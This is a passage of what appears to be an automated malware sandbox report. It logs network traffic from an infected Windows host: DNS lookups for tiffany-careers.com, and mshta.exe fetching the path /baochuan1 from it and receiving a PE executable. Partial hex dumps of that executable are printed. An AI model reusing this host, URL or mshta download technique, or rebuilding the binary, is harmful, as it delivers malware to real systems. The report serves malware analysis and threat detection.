                                                                                                                  Dec 23, 2024 07:12:03.937621117 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.937645912 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:03.937665939 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.937681913 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:03.937740088 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:03.944607973 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.944654942 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.944700956 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:03.944709063 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.944744110 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:03.944755077 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:03.952156067 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.952203035 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.952228069 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:03.952235937 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.952275991 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:03.958800077 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.958847046 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.958877087 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:03.958889008 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.958914995 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:03.958933115 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.100444078 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.100513935 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.100558996 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.100574017 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.100613117 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.100626945 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.107928991 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.107983112 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.108067989 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.108089924 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.108119965 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.108133078 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.114514112 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.114573002 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.114620924 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.114643097 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.114685059 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.122138023 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.122189045 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.122281075 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.122303009 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.122332096 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.122446060 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.129630089 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.129676104 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.129726887 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.129754066 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.129770994 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.130261898 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.136699915 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.136746883 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.136774063 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.136785030 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.136820078 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.144292116 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.144318104 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.144377947 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.144391060 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.144419909 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.144438028 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.150893927 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.150913000 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.150974035 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.150983095 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.151170969 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.292495966 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.292521000 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.292579889 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.292601109 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.292628050 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.292643070 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.299966097 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.299983978 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.300033092 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.300048113 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.300086975 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.300107002 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.306775093 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.306833982 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.306905031 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.306936026 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.306946993 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.307209969 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.314343929 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.314404964 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.314424038 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.314435005 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.314460993 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.314481974 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.321969032 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.322030067 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.322063923 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.322076082 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.322086096 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.322115898 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.328917980 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.328948975 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.329010963 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.329025984 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.329061985 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.336437941 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.336463928 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.336512089 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.336527109 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.336545944 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.336561918 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.343012094 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.343034983 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.343075037 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.343113899 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.343131065 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.343353987 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.485337973 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.485364914 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.485428095 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.485450029 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.485502005 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.491981983 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.492002964 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.492063046 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.492073059 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.492104053 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.492115974 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.499370098 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.499388933 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.499449968 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.499459982 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.499495983 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.501585960 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.501645088 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.501651049 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.501662970 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.501705885 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.502269983 CET49759443192.168.2.5147.45.49.155

                                                                                                                  UDP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Dec 23, 2024 07:11:32.709031105 CET6087553192.168.2.51.1.1.1
                                                                                                                  Dec 23, 2024 07:11:32.847862959 CET53608751.1.1.1192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:58.223584890 CET5389653192.168.2.51.1.1.1
                                                                                                                  Dec 23, 2024 07:12:07.320462942 CET5217953192.168.2.51.1.1.1
                                                                                                                  Dec 23, 2024 07:12:07.458822012 CET53521791.1.1.1192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:25.160470009 CET6373953192.168.2.51.1.1.1
                                                                                                                  Dec 23, 2024 07:12:25.298820019 CET53637391.1.1.1192.168.2.5

                                                                                                                  DNS Queries

                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  Dec 23, 2024 07:11:32.709031105 CET192.168.2.51.1.1.10x757bStandard query (0)tiffany-careers.comA (IP address)IN (0x0001)false
                                                                                                                  Dec 23, 2024 07:11:58.223584890 CET192.168.2.51.1.1.10xd9b4Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                                                  Dec 23, 2024 07:12:07.320462942 CET192.168.2.51.1.1.10xc65bStandard query (0)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsA (IP address)IN (0x0001)false
                                                                                                                  Dec 23, 2024 07:12:25.160470009 CET192.168.2.51.1.1.10xa0c3Standard query (0)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsA (IP address)IN (0x0001)false

                                                                                                                  DNS Answers

                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  Dec 23, 2024 07:11:32.847862959 CET1.1.1.1192.168.2.50x757bNo error (0)tiffany-careers.com147.45.49.155A (IP address)IN (0x0001)false
                                                                                                                  Dec 23, 2024 07:11:58.363641977 CET1.1.1.1192.168.2.50xd9b4No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Dec 23, 2024 07:12:07.458822012 CET1.1.1.1192.168.2.50xc65bName error (3)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsnonenoneA (IP address)IN (0x0001)false
                                                                                                                  Dec 23, 2024 07:12:25.298820019 CET1.1.1.1192.168.2.50xa0c3Name error (3)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsnonenoneA (IP address)IN (0x0001)false

                                                                                                                  HTTP Request Dependency Graph

                                                                                                                  • tiffany-careers.com

                                                                                                                  HTTPS Proxied Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.549704147.45.49.1554431988C:\Windows\System32\mshta.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-23 06:11:34 UTC332OUTGET /baochuan1 HTTP/1.1
                                                                                                                  Accept: */*
                                                                                                                  Accept-Language: en-CH
                                                                                                                  UA-CPU: AMD64
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                  Host: tiffany-careers.com
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2024-12-23 06:11:35 UTC397INHTTP/1.1 200 OK
                                                                                                                  etag: "6bcfb-67671134-23c46;;;"
                                                                                                                  last-modified: Sat, 21 Dec 2024 19:04:20 GMT
                                                                                                                  content-length: 441595
                                                                                                                  accept-ranges: bytes
                                                                                                                  date: Mon, 23 Dec 2024 06:11:34 GMT
                                                                                                                  server: LiteSpeed
                                                                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                  connection: close
                                                                                                                  2024-12-23 06:11:35 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 1b 8a 28 f3 7a e4 7b f3 7a e4 7b f3 7a e4 7b e7 11 e7 7a f0 7a e4 7b e7 11 e0 7a e4 7a e4 7b e7 11 e1 7a f4 7a e4 7b e7 11 e5 7a ee 7a e4 7b f3 7a e5 7b da 7b e4 7b e7 11 ed 7a e0 7a e4 7b e7 11 1b 7b f2 7a e4 7b e7 11 e6 7a f2 7a e4 7b 52 69 63 68 f3 7a e4 7b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 b4 fd 18 da 00 00 00
                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(z{z{z{zz{zz{zz{zz{z{{{zz{{z{zz{Richz{PEL
                                                                                                                  2024-12-23 06:11:35 UTC16384INData Raw: 33 d2 89 10 89 13 89 17 85 f6 0f 84 89 00 00 00 8d 41 02 89 45 fc 66 8b 01 83 c1 02 66 3b c2 75 f5 2b 4d fc d1 f9 74 71 83 f9 03 77 6c 6a 30 58 89 45 fc 85 c9 74 16 66 8b 04 56 66 2b 45 fc 66 83 f8 09 77 54 42 3b d1 72 ed 6a 30 58 83 f9 03 75 1d 8b 4d f8 0f b7 06 6a 30 5a 2b c2 89 01 0f b7 46 02 2b c2 89 03 0f b7 46 04 2b c2 eb 15 83 f9 02 75 14 0f b7 06 6a 30 59 2b c1 89 03 0f b7 46 02 2b c1 89 07 eb 0c 83 f9 01 75 07 0f b7 0e 2b c8 89 0f 33 c0 40 eb 02 33 c0 5f 5e 5b c9 c2 08 00 8b ff 55 8b ec 83 ec 14 53 56 57 85 c9 74 5c 83 65 fc 00 83 65 f4 00 6a 03 58 66 89 45 ec 8d 45 fc 50 68 e0 14 40 00 6a fc 51 ff 15 10 13 41 00 85 c0 75 37 8b 45 fc 85 c0 74 30 8b 18 8d 75 ec 83 ec 10 8b fc 8b 4b 54 6a 01 a5 50 a5 a5 a5 ff 15 4c 14 41 00 ff 53 54 8b 45 fc 50 8b
                                                                                                                  Data Ascii: 3AEff;u+Mtqwlj0XEtfVf+EfwTB;rj0XuMj0Z+F+F+uj0Y+F+u+3@3_^[USVWt\eejXfEEPh@jQAu7Et0uKTjPLASTEP
                                                                                                                  2024-12-23 06:11:35 UTC16384INData Raw: 5e eb 0b ff 72 f4 8b cb 52 e8 53 02 00 00 5f 8b c3 5b 5d c2 04 00 6a 08 b8 10 ed 40 00 e8 52 5b 00 00 8b f1 89 75 f0 68 78 02 41 00 e8 6f ba ff ff ff 75 08 83 65 fc 00 8b ce e8 1c 00 00 00 84 c0 75 0a ff 75 08 8b ce e8 57 ff ff ff 83 4d fc ff 8b c6 e8 ea 5a 00 00 c2 04 00 8b ff 55 8b ec 51 8b 45 08 32 d2 85 c0 74 12 a9 00 00 ff ff 75 0b 0f b7 c0 50 e8 52 c7 ff ff b2 01 8a c2 59 5d c2 04 00 6a 04 b8 44 ed 40 00 e8 e5 5a 00 00 8b d1 83 65 f0 00 8b 7d 0c 85 ff 79 02 33 ff 8b 75 10 85 f6 79 02 33 f6 b8 ff ff ff 7f 2b c7 3b c6 7c 67 8b 1a 8d 04 37 8b 4b f4 3b c1 7e 04 8b f1 2b f7 3b f9 7e 02 33 f6 85 ff 75 28 3b f1 75 24 8d 4b f0 e8 38 c8 ff ff 8b 4d 08 83 c0 10 89 01 21 7d fc c7 45 f0 01 00 00 00 8b c1 e8 51 5a 00 00 c2 0c 00 8b ca e8 bb c7 ff ff 8b 4d 08 50
                                                                                                                  Data Ascii: ^rRS_[]j@R[uhxAoueuuWMZUQE2tuPRY]jD@Ze}y3uy3+;|g7K;~+;~3u(;u$K8M!}EQZMP
                                                                                                                  2024-12-23 06:11:35 UTC16384INData Raw: fc 8d 41 28 57 8b 7d fc 89 45 fc 3b f8 74 3b 53 56 8b 1f 85 db 74 24 8b f3 8b 5b 04 8d 4e 08 e8 c0 e8 ff ff 56 6a 00 ff 15 f4 11 41 00 50 ff 15 dc 12 41 00 85 db 75 df 8b 45 fc c7 07 00 00 00 00 83 c7 04 3b f8 75 c9 5e 5b 5f c9 c3 8b ff 55 8b ec 56 57 8b 39 33 f6 56 6a ff 57 ff 15 30 12 41 00 b9 80 00 00 00 3d 02 01 00 00 74 08 85 c0 74 0c 3b c1 75 15 85 c0 74 04 3b c1 75 02 8b f7 8b 45 08 5f 89 30 5e 5d c2 10 00 51 8b 4d 04 e8 1e e4 ff ff cc 8b ff 55 8b ec 51 53 56 8b f1 8b da 33 c9 57 3b f3 74 45 8b 7d 08 85 ff 74 3e 66 39 0f 74 39 8b cf e8 47 df ff ff 2b de 89 45 fc 3b d8 73 0c 8b 45 0c 85 c0 74 2b 83 20 00 eb 26 50 57 53 56 ff 15 1c 14 41 00 8b 45 0c 83 c4 10 85 c0 74 02 89 30 8b 45 fc 03 c6 eb 0b 8b 45 0c 85 c0 74 02 89 08 8b c6 5f 5e 5b c9 c2 08 00
                                                                                                                  Data Ascii: A(W}E;t;SVt$[NVjAPAuE;u^[_UVW93VjW0A=tt;ut;uE_0^]QMUQSV3W;tE}t>f9t9G+E;sEt+ &PWSVAEt0EEt_^[
                                                                                                                  2024-12-23 06:11:35 UTC16384INData Raw: ac 31 01 00 7c 31 01 00 42 31 01 00 16 31 01 00 ec 30 01 00 c0 30 01 00 8e 30 01 00 60 30 01 00 30 30 01 00 fe 2f 01 00 c0 2f 01 00 8e 2f 01 00 6c 2f 01 00 0e 2f 01 00 da 2e 01 00 b6 2e 01 00 90 2e 01 00 48 2e 01 00 f8 2d 01 00 a8 2d 01 00 5a 2d 01 00 26 2d 01 00 f0 2c 01 00 b0 2c 01 00 6a 2c 01 00 40 2c 01 00 1a 2c 01 00 ec 2b 01 00 c0 2b 01 00 78 2b 01 00 48 2b 01 00 20 2b 01 00 e6 2a 01 00 aa 2a 01 00 72 2a 01 00 2c 2a 01 00 fa 29 01 00 a6 29 01 00 7a 29 01 00 4c 29 01 00 1e 29 01 00 f4 28 01 00 b2 28 01 00 56 28 01 00 20 28 01 00 ca 27 01 00 7a 27 01 00 3c 27 01 00 06 27 01 00 d0 26 01 00 7e 26 01 00 4c 26 01 00 22 26 01 00 ee 25 01 00 a8 25 01 00 6a 25 01 00 32 25 01 00 e4 24 01 00 a8 24 01 00 74 24 01 00 3e 24 01 00 08 24 01 00 cc 23 01 00 8e 23 01
                                                                                                                  Data Ascii: 1|1B11000`000///l//...H.--Z-&-,,j,@,,++x+H+ +**r*,*))z)L))((V( ('z'<''&~&L&"&%%j%2%$$t$>$$##
                                                                                                                  2024-12-23 06:11:35 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 1b 8a 28 f3 7a e4 7b f3 7a e4 7b f3 7a e4 7b e7 11 e7 7a f0 7a e4 7b e7 11 e0 7a e4 7a e4 7b e7 11 e1 7a f4 7a e4 7b e7 11 e5 7a ee 7a e4 7b f3 7a e5 7b da 7b e4 7b e7 11 ed 7a e0 7a e4 7b e7 11 1b 7b f2 7a e4 7b e7 11 e6 7a f2 7a e4 7b 52 69 63 68 f3 7a e4 7b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 b4 fd 18 da 00 00 00
                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(z{z{z{zz{zz{zz{zz{z{{{zz{{z{zz{Richz{PEL
                                                                                                                  2024-12-23 06:11:35 UTC16384INData Raw: 33 d2 89 10 89 13 89 17 85 f6 0f 84 89 00 00 00 8d 41 02 89 45 fc 66 8b 01 83 c1 02 66 3b c2 75 f5 2b 4d fc d1 f9 74 71 83 f9 03 77 6c 6a 30 58 89 45 fc 85 c9 74 16 66 8b 04 56 66 2b 45 fc 66 83 f8 09 77 54 42 3b d1 72 ed 6a 30 58 83 f9 03 75 1d 8b 4d f8 0f b7 06 6a 30 5a 2b c2 89 01 0f b7 46 02 2b c2 89 03 0f b7 46 04 2b c2 eb 15 83 f9 02 75 14 0f b7 06 6a 30 59 2b c1 89 03 0f b7 46 02 2b c1 89 07 eb 0c 83 f9 01 75 07 0f b7 0e 2b c8 89 0f 33 c0 40 eb 02 33 c0 5f 5e 5b c9 c2 08 00 8b ff 55 8b ec 83 ec 14 53 56 57 85 c9 74 5c 83 65 fc 00 83 65 f4 00 6a 03 58 66 89 45 ec 8d 45 fc 50 68 e0 14 40 00 6a fc 51 ff 15 10 13 41 00 85 c0 75 37 8b 45 fc 85 c0 74 30 8b 18 8d 75 ec 83 ec 10 8b fc 8b 4b 54 6a 01 a5 50 a5 a5 a5 ff 15 4c 14 41 00 ff 53 54 8b 45 fc 50 8b
                                                                                                                  Data Ascii: 3AEff;u+Mtqwlj0XEtfVf+EfwTB;rj0XuMj0Z+F+F+uj0Y+F+u+3@3_^[USVWt\eejXfEEPh@jQAu7Et0uKTjPLASTEP
                                                                                                                  2024-12-23 06:11:35 UTC16384INData Raw: 5e eb 0b ff 72 f4 8b cb 52 e8 53 02 00 00 5f 8b c3 5b 5d c2 04 00 6a 08 b8 10 ed 40 00 e8 52 5b 00 00 8b f1 89 75 f0 68 78 02 41 00 e8 6f ba ff ff ff 75 08 83 65 fc 00 8b ce e8 1c 00 00 00 84 c0 75 0a ff 75 08 8b ce e8 57 ff ff ff 83 4d fc ff 8b c6 e8 ea 5a 00 00 c2 04 00 8b ff 55 8b ec 51 8b 45 08 32 d2 85 c0 74 12 a9 00 00 ff ff 75 0b 0f b7 c0 50 e8 52 c7 ff ff b2 01 8a c2 59 5d c2 04 00 6a 04 b8 44 ed 40 00 e8 e5 5a 00 00 8b d1 83 65 f0 00 8b 7d 0c 85 ff 79 02 33 ff 8b 75 10 85 f6 79 02 33 f6 b8 ff ff ff 7f 2b c7 3b c6 7c 67 8b 1a 8d 04 37 8b 4b f4 3b c1 7e 04 8b f1 2b f7 3b f9 7e 02 33 f6 85 ff 75 28 3b f1 75 24 8d 4b f0 e8 38 c8 ff ff 8b 4d 08 83 c0 10 89 01 21 7d fc c7 45 f0 01 00 00 00 8b c1 e8 51 5a 00 00 c2 0c 00 8b ca e8 bb c7 ff ff 8b 4d 08 50
                                                                                                                  Data Ascii: ^rRS_[]j@R[uhxAoueuuWMZUQE2tuPRY]jD@Ze}y3uy3+;|g7K;~+;~3u(;u$K8M!}EQZMP
